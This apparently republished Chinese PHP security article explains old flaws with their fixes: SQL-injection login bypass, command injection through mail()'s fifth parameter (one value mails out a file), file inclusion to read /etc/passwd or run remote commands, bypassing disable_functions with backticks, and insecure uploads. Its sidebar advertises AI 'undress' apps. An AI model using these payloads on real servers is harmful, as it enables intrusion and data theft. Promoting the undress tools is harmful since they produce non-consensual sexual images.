php安全之狗尾续貂_PHP
Shaun Clowes的文章Exploiting Common Vulnerabilities in PHP Applications的确写的很棒,
考虑到了很多方面,我这个文章只是狗尾续貂,补充一些其它没怎么提到的问题。本文侧重于解决问题,而不是
攻击。
1、古老的欺骗SQL语句
在默认模式下,即使是你忘了把php.ini拷到/usr/local/lib/php.ini下,php还是打开magic_quotes_gpc=on。
这样所有从GET/POST/Cookie来的变量的单引号(')、双引号(")、反斜杠backslash()以及空字元NUL
(the null byte)都会被加上反斜杠,以使数据库能够正确查询。
但是在php-4-RC2的时候引入了一个配置文件php.ini-optimized,这个优化的php.ini却是
magic_quotes_gpc=off的。某些网管看到optimized字样也许就会把php.ini-optimized拷到
/usr/local/lib/php.ini,这时就比较危险。象比较简单的验证,假设没有过滤必要的字符:
select * from login where user='$HTTP_POST_VARS[user]' and pass='$HTTP_POST_VARS[pass]'
我们就可以在用户框和密码框输入1‘ or 1='1通过验证了。这是非常古董的方法了,这个语句会
替换成这样:
select * from login where user='1' or 1='1' and pass='1' or 1='1'
因为or 1='1'成立,所以通过了。
解决的办法最好就是过滤所有不必要的字符,还有就是推荐对于从GET/POST/Cookie来的并且用在SQL
中的变量加一个自定义的函数:
function gpc2sql($str) {
if(get_magic_quotes_gpc()==1)
return $str;
else
return addslashes($str);
}
主要是为了你的程序能安全移植在各种系统里。
2、mail函数的第五个参数
在php-4.0.5的时候,mail函数引入了第五个参数,用来设置在实际发送邮件的时候增加额外的命令行参数,
但是没有很好的检查特殊SHELL命令字符,所以出现执行命令的大问题。就像手册里的例子:
mail("nobody@aol.com", "the subject", $message, "From: webmaster@$SERVER_NAME", "-fwebmaster@$SERVERNAME");
这个是存在问题的,如果$SERVER_NAME=;mail san@xfocus.org 到我的信箱了。
这里提醒一下,php手册里还有好几个例子存在安全问题的,大家实际使用的时候不要照搬,它只是演示函数的
基本功能,理解了就可以了。
对于mail函数的这个问题,最简单的我们就不用这个第五个参数,要使用就过滤非法的字符如(;),还有就是修改
php源码包的程序ext/standard/mail.c,在if (extra_cmd != NULL) { 前增加如下一行:
extra_cmd=NULL
然后重新编译。
3、UNIX版的require, include函数
win版本的require和include函数是不支持HTTP和FTP远程文件包含的,而UNIX版本默认都是支持远程包含文件。
require和include不管你是什么扩展名的,把你包含进来就作为程序的一部分来执行。
我们在写程序的时候为了程序的模块化,以及程序的可移植性,不可避免的用到很多require或include函数,
而且有时用变量作为参数,比如:include("$something"); 如果这时用户能控制$something参数,而这个
参数又没有过滤,那就惨拉。
首先可以看任何web用户有读权限的文件,假设这个程序叫http://victim/test.php,这样我们就可以用如下
url: http://victim/test.php?something=/etc/passwd 看到/etc/passwd文件。
另外可以利用其远程文件包含的功能执行命令。比如我在www.xfocus.org下建立一个文件test.php,内容是:
,那么我就可以用如下的url:
http://victim/test.php?something=http://www.xfocus.org/test.php?cmd=uname这种方式运行任
意的命令。
phpMyAdmin也出现了这个问题,我们可以用它看任何我们想看的文件。但是它在include前,先用file_exist
函数判断文件是否存在,而这个file_exist是不支持远程文件的,所以上面第二种办法无法直接使用。但是我们
可以利用apache的日志功能,请求一个带php代码的url,这样,something指定为apache的日志也可以执行命
令了,但是apache的日志通常比较大,有太多杂乱信息。
http://www.securereality.com.au/sradv00008.txt提到的办法比较巧妙,用file upload的方式把本地
的执行命令的脚本上传,会在服务器的文件上传临时目录里产生php8Ta02I之类的文件名,由于这时文件是存在的
,所以能通过file_exist函数,从而执行上传文件里的执行脚本。
所以对于include, require函数的使用一定要小心,特别是以包含的文件以参数指定这种方式,参数绝对不能
让用户来控制。还有通过修改php.ini文件去掉远程文件包含这个功能。这个在php-4.0.3以前用
disable-url-fopen-wrapper 在以后的版本用allow_url_fopen = off来关闭。
4、disable_function
在php-4.0.1,php.ini里引入了一项功能disable_functions , 这个功能比较有用,可以用它禁止一些函数。
比如在php.ini里加上disable_functions = passthru exec system popen 那么在执行这些函数的时候
只会提示Warning: system() has been disabled for security reasons.
唉,但是也不是没有办法执行系统命令了。因为php采用了很多perl的特性,比如还可以用(`)来执行命令:
$output = `ls -al`;
echo "
$output
?>
这个只有设成safe_mode才能避免,可是可恶的safe_mode实在是限制太多了,做其它事情也有些碍手碍脚。
5、file upload
php文件上传的问题在文章http://www.securereality.com.au/sradv00001.html里已经描述的很清楚了,
这的确是个比较严重的问题,一般我们要上传的文件也会放在web目录,所以容易给攻击者得到系统的一些web用户
能读的文件。
幸亏在php-4.0.3以后提供了is_uploaded_file和move_uploaded_file函数。所以php-4.0.3以上的上传文
件的程序一定不要再用copy函数了,用move_uploaded_file代替,它会检查是否是上传的文件。如果是php-4.0.2
及以下的,建议在copy前加一个函数:
function is_uploaded_file($filename) {
if (!$tmp_file = get_cfg_var('upload_tmp_dir')) {
$tmp_file = dirname(tempnam('', ''));
}
$tmp_file.='/'.basename($filename);
/* User might have trailing slash in php.ini... */
return (ereg_replace('/+', '/', $tmp_file) == $filename);
}
这个漏洞在安全焦点呆了很久,只是在copy之前有很多验证阿、判断阿的语句,所以使之攻击存在相当的难度,赫赫。
还有,千万不要以环境变量、Cookie变量、session变量等作为关系生死的判断条件,因为这些变量太容易被伪造了。
呵呵,手头事情比较多,其它慢慢想到了再加吧,也欢迎其他同志任意的添加修改之。
参考文献
1、PHP 4 ChangeLog (http://www.php.net/ChangeLog-4.php)
2、A Study In Scarlet - Exploiting Common Vulnerabilities in PHP Applications
(http://www.securereality.com.au/studyinscarlet.txt)及analysist的翻译。
3、Remote command execution vulnerabilities in phpMyAdmin and phpPgAdmin
(http://www.securereality.com.au/sradv00008.txt)
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
Clock app missing in iPhone: How to fix it
May 03, 2024 pm 09:19 PM
Is the clock app missing from your phone? The date and time will still appear on your iPhone's status bar. However, without the Clock app, you won’t be able to use world clock, stopwatch, alarm clock, and many other features. Therefore, fixing missing clock app should be at the top of your to-do list. These solutions can help you resolve this issue. Fix 1 – Place the Clock App If you mistakenly removed the Clock app from your home screen, you can put the Clock app back in its place. Step 1 – Unlock your iPhone and start swiping to the left until you reach the App Library page. Step 2 – Next, search for “clock” in the search box. Step 3 – When you see “Clock” below in the search results, press and hold it and
Complete collection of excel function formulas
May 07, 2024 pm 12:04 PM
1. The SUM function is used to sum the numbers in a column or a group of cells, for example: =SUM(A1:J10). 2. The AVERAGE function is used to calculate the average of the numbers in a column or a group of cells, for example: =AVERAGE(A1:A10). 3. COUNT function, used to count the number of numbers or text in a column or a group of cells, for example: =COUNT(A1:A10) 4. IF function, used to make logical judgments based on specified conditions and return the corresponding result.
vivox200ultra parameters and price details
Jun 28, 2024 pm 01:23 PM
The latest official news of vivox200ultra has exposed the parameters and price details of vivox200ultra. It is reported that vivox200ultra will be equipped with a 10x periscope super telephoto lens, and the price starts at about 6999 yuan. It can be seen that it occupies an absolute advantage in photography performance. The following are the parameters and prices of vivox200ultra Come and see the details. 1. Parameter configuration details of vivox200ultra 1. Vivox200ultra rendering From the vivo X200 Ultra rendering, the front of the phone adopts a borderless full-screen design, and the visual effect of the entire front of the phone can be said to be very invincible. 2. vivox200ultra has Blackhawk frame
Implementing Machine Learning Algorithms in C++: Security Considerations and Best Practices
Jun 01, 2024 am 09:26 AM
When implementing machine learning algorithms in C++, security considerations are critical, including data privacy, model tampering, and input validation. Best practices include adopting secure libraries, minimizing permissions, using sandboxes, and continuous monitoring. The practical case demonstrates the use of the Botan library to encrypt and decrypt the CNN model to ensure safe training and prediction.
Things to note when Golang functions receive map parameters
Jun 04, 2024 am 10:31 AM
When passing a map to a function in Go, a copy will be created by default, and modifications to the copy will not affect the original map. If you need to modify the original map, you can pass it through a pointer. Empty maps need to be handled with care, because they are technically nil pointers, and passing an empty map to a function that expects a non-empty map will cause an error.
PHP Microframework: Security Discussion of Slim and Phalcon
Jun 04, 2024 am 09:28 AM
In the security comparison between Slim and Phalcon in PHP micro-frameworks, Phalcon has built-in security features such as CSRF and XSS protection, form validation, etc., while Slim lacks out-of-the-box security features and requires manual implementation of security measures. For security-critical applications, Phalcon offers more comprehensive protection and is the better choice.
Security configuration and hardening of Struts 2 framework
May 31, 2024 pm 10:53 PM
To protect your Struts2 application, you can use the following security configurations: Disable unused features Enable content type checking Validate input Enable security tokens Prevent CSRF attacks Use RBAC to restrict role-based access
Which wallet is safer for SHIB coins? (Must read for newbies)
Jun 05, 2024 pm 01:30 PM
SHIB coin is no longer unfamiliar to investors. It is a conceptual token of the same type as Dogecoin. With the development of the market, SHIB’s current market value has ranked 12th. It can be seen that the SHIB market is hot and attracts countless investments. investors participate in investment. In the past, there have been frequent transactions and wallet security incidents in the market. Many investors have been worried about the storage problem of SHIB. They wonder which wallet is safer for SHIB coins at the moment? According to market data analysis, the relatively safe wallets are mainly OKXWeb3Wallet, imToken, and MetaMask wallets, which will be relatively safe. Next, the editor will talk about them in detail. Which wallet is safer for SHIB coins? At present, SHIB coins are placed on OKXWe
